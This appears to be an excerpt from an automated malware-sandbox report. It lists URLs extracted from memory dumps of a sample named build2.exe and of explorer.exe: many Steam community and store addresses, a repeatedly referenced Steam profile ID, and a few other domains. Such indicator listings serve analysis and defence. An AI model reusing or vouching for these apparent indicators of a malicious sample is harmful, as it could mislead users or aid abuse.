            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: explorer.exe, 0000002A.00000003.2707064136.0000000008FE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710133432.0000000008FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comen
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/$ix-
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899(J$-
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
            Source: build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
            Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611996897178992
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
